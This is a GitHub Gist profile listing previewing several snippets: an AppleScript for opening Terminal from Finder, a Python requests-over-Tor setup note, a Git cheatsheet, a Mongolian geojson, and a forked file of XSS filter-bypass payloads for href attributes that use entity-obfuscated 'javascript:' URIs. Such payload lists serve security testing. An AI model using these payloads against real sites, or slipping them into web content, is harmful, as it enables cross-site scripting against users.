Skip to content

Instantly share code, notes, and snippets.

@Puujee0238
Puujee0238 / Terminal_in_Finder.scpt
Created April 29, 2024 02:11
VSCode, Terminal, Warp icon in Finder Toolbar
on run {input, parameters}
tell application "Finder"
set myPath to (POSIX path of (target of front window as alias))
end tell
tell application "Terminal"
do script "cd " & myPath
activate
end tell
@Puujee0238
Puujee0238 / tor.py
Created October 20, 2020 05:39 — forked from jefftriplett/tor.py
Python Requests + Tor (Socks5)
"""
setup:
pip install requests
pip install requests[socks]
super helpful:
- http://packetforger.wordpress.com/2013/08/27/pythons-requests-module-with-socks-support-requesocks/
- http://docs.python-requests.org/en/master/user/advanced/#proxies
"""
@Puujee0238
Puujee0238 / href_bypass.html
Created June 13, 2020 19:04 — forked from hackerscrolls/href_bypass.html
XSS payloads for href
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
@Puujee0238
Puujee0238 / README.md
Created January 23, 2018 02:30 — forked from hofmannsven/README.md
My simply Git Cheatsheet
@Puujee0238
Puujee0238 / Mongolian map.geojson
Created December 24, 2017 10:06
Mongolia population 2016 geojson
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.